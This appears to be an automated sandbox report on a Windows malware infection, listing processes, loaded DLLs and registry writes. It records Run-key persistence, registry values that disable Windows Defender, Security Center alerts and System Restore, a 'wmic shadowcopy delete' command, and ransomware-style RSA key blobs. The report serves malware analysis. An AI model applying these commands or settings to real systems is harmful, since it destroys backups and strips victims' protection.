c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\apphelp.dll
c:\users\admin\4950606094303050\wincfg32svc.exe

PID
2928
CMD
C:\Users\admin\657607470096780\winsvcs.exe
Path
C:\Users\admin\657607470096780\winsvcs.exe
Indicators
Parent process
2746537711.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\657607470096780\winsvcs.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\version.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\apphelp.dll
c:\users\admin\appdata\local\temp\1958842343.exe
c:\users\admin\appdata\local\temp\3088011411.exe

PID
3568
CMD
C:\Users\admin\4950606094303050\wincfg32svc.exe
Path
C:\Users\admin\4950606094303050\wincfg32svc.exe
Indicators
Parent process
3875839546.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\4950606094303050\wincfg32svc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\wshtcpip.dll

PID
2180
CMD
C:\Users\admin\AppData\Local\Temp\3468116065.exe
Path
C:\Users\admin\AppData\Local\Temp\3468116065.exe
Indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3468116065.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\profapi.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\iconcodecservice.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\version.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\credssp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll

PID
2160
CMD
C:\Users\admin\AppData\Local\Temp\1958842343.exe
Path
C:\Users\admin\AppData\Local\Temp\1958842343.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\1958842343.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll

PID
2124
CMD
C:\Users\admin\AppData\Local\Temp\3088011411.exe
Path
C:\Users\admin\AppData\Local\Temp\3088011411.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3088011411.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\msvcr100.dll

PID
3940
CMD
"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Path
C:\Windows\system32\wbem\wmic.exe
Indicators
No indicators
Parent process
3468116065.exe
User
admin
Integrity Level
MEDIUM
Exit code
2147749908
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wbem\wmiutils.dll

PID
3828
CMD
C:\Users\admin\AppData\Local\Temp\3358028963.exe
Path
C:\Users\admin\AppData\Local\Temp\3358028963.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3358028963.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll

PID
3124
CMD
C:\Users\admin\AppData\Local\Temp\3782739527.exe
Path
C:\Users\admin\AppData\Local\Temp\3782739527.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3782739527.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\profapi.dll

Registry activity

Total events
1289
Read events
1116
Write events
171
Delete events
2

Modification events

PID
Process
Operation
Key
Name
Value
3676
3875839546.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinCfgMgr
C:\Users\admin\4950606094303050\wincfg32svc.exe
3676
3875839546.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
WinCfgMgr
C:\Users\admin\4950606094303050\wincfg32svc.exe
2884
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2884
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3784
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
3784
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
3784
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3784
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3844
979574639568794.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft Windows Services
C:\Users\admin\495030305060\winsvcs.exe
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
EnableFileTracing
0
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
EnableConsoleTracing
0
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
FileTracingMask
4294901760
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
ConsoleTracingMask
4294901760
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
MaxFileSize
1048576
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
FileDirectory
%windir%\tracing
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
EnableFileTracing
0
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
EnableConsoleTracing
0
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
FileTracingMask
4294901760
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
ConsoleTracingMask
4294901760
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
MaxFileSize
1048576
2648
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
FileDirectory
%windir%\tracing
2648
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2648
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2648
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2648
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
2820
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\AppData\Local\Temp\Love_You_2019_33235120-txt.zip
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
2820
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
@C:\Windows\System32\wshext.dll,-4804
JScript Script File
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Placement
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF42000000420000000204000037020000
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General
LastFolder
C:\Users\admin\AppData\Local\Temp
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
name
120
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
size
80
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
psize
80
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
type
120
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
mtime
100
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
crc
70
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_0
38000000730100000402000000000000D4D0C800000000000000000000000000320101000000000039000000B40200000000000001000000
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_1
38000000730100000500000000000000D4D0C8000000000000000000000000003401010000000000160000002A0000000000000002000000
2820
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_2
38000000730100000400000000000000D4D0C8000000000000000000000000001C0102000000000016000000640000000000000003000000
3736
2746537711.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Microsoft Windows Services
C:\Users\admin\657607470096780\winsvcs.exe
3736
2746537711.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft Windows Services
C:\Users\admin\657607470096780\winsvcs.exe
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection
DisableScanOnRealtimeEnable
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection
DisableOnAccessProtection
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection
DisableBehaviorMonitoring
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
AntiVirusOverride
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
UpdatesOverride
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
FirewallOverride
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
AntiVirusDisableNotify
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
UpdatesDisableNotify
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
AutoUpdateDisableNotify
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
FirewallDisableNotify
1
2928
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
DisableSR
1
2928
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2928
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000006A000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2928
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2928
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\ex_data\data
ext
2E007A0068007300710076007A000000
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\keys_data\data
public
0602000000A40000525341310008000001000100DF2BA59D8757A4C3723EE6E3EF8AE08DFBDA63419C548702CD95810F02DF3BFBA92ECAB17CD52C49775F35132D0ADCF9807126955D3CD390A4746B955311055A6DE2C841D3EE91745B84407E0CE48AE6631B5055B040F2F4A4F4974508355502DCFC056BA0AE9DB6129162A5A3DD779491E148C81D4592851B61C58D2545DC872A9729B4E2DA3239989A3C19CF4D866E5D2717FA212E6B0AF1275FD339B933ED30CEA21457A5ECB3FB9B2E93A07233499195EF4156BF6D9F5045EA186EA0435DDD3E32F3954F2014E83AE921C0AD004F2C029BD5401E1EDABCEA53DB0174E508141118B0D060CD789C6F8C42FE4FC500BA111FC5A6D37AB7D2EE527A62C30187
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\keys_data\data
private
940400009304D6E32E28DEE9BC7FC75049739E33049FE4FA29E498A0F5FE09BED0FD2DF3B8C62060CE5799E2BAE14F37CB3BB1DB8C98BEB3E9AC9D7FEF5639E6D6FF1024600316B21B19B0FAB69EF2666286420BA278332A954C160F42B3B85006BDC2E0069EE59628CE42AE5B25D38E6EBDEF4E5DC1BABA99F323478C4AAEA5D3D7A82F2E0D3ADB37B5B6D27BE8FB318FBCE9D9DFB8DFA5F767B7D8006873EEDCE6A9817F1C42BAFE86DD2E945238733EBC99403FBA42045423B263B835A4B5728BECF8C623B099DFD8DEF90EC38E74662359BB64064E8399F4EF624B396B33F01AB1E59C0ED844DA8ECE3367F8BB50ACF5E719491F17C42BB14BC9C85544BD06447744118744E420AEC55E5210DE5F7B822DA3F02BDA8C432CBC78677FB9E32DDB9F9129B885602B20A7F82DAB31A55AB00ADA89A2CD7D0758F03C6E9EC70DB43DF0916982516269179E5BBC6FA4C8D909A6F2C05EC68351113044D82AB805A5577D63F77C0BE45698D7721A470829235667F5FA5346AFEA97F81D536EA6463F0A73903AD18931D2E285F8EEC334F5CF8D11542C88F85FA2AF8AA31CB67DB0FFBC30A1BF3068C77C0B25270D97709EFEB8416BAA52831DA88B18B1D85E975F97F064F58C8C0F4958CE60DC5843F9987A5B9B6D7AF4660BAFEB852CA2091858296C59BE5F4ED58E9E2F6D57692733FDFDC98BF8C3501EEED21EAC1F4DBFD1676747901E0F942AEB1076DD421A44B981DED3D6D76E4611AFCF8B77F0C41CCDB67A0AC62B98F5E5C8791836F62EE69468EBAFF99C7819B9D0CBD901CA587CC5BE55E1A0B4FB3DA1538DF4776004750EA8016A3981FB190F1360699EBA9193CB8791621975E9710B4880E5DA336D68BF2650D94B840970866C1476300F49D1AA1E75CFEAEBE965B9A92D076179A24784A8262E245B0535520A909B00C5DD861E942D62E32B89A2FB1C7F7E09E47C392E0B227D7F1D9527F5F1D922E69FBA9DD4533B63D843CD0585FCD25E6D191B1BB27229E53DFE8F89CCE8E39CF9848C3C6BF0C476CE3B37D4FFEE878155EAF3345FADD17017671353019A9FC5A40BEC0F2D1E6B9459607E59597D1FB4F53F5DB6341D3FCF80031B58406070D230C41225D5B4B0E441552F871D8A9DA5D137293E602C737FF80BB2F8C9848956F670621A88C28286A08FE3AE80571D6070E1C169893C15D1B38125701D2DF4C72B0286FF5B8D5B6F7EF65DC97D84BFA8FF02809BEFAB34FA94346C2407914A19EE5AEAF6071D1EE73734793F0775A7508A69070F656FDE08013673F4BF2D46FA83F94CE2207885D3F91EC9028BB03F4FD6501749592C907BD9B5F5DA817F9F5494940AD7F8B6832719E914A0574409CBD61B283B90881CFA0717E7D7FD14C15A2E251851B0100982898E0CA57C6731D99C88D80B5918204FFD85F2574D2C845042622FB609865AC9BABC653EBE5F0D00D8560B7217BAA96501B04AE93CC1742C2D1BBF6E7E91B1643DA1E9235506E476F00C63FAF23B9C0D84E9A826FCD86D324668FA8155391D23B31830ACF2592CD843C527C09E4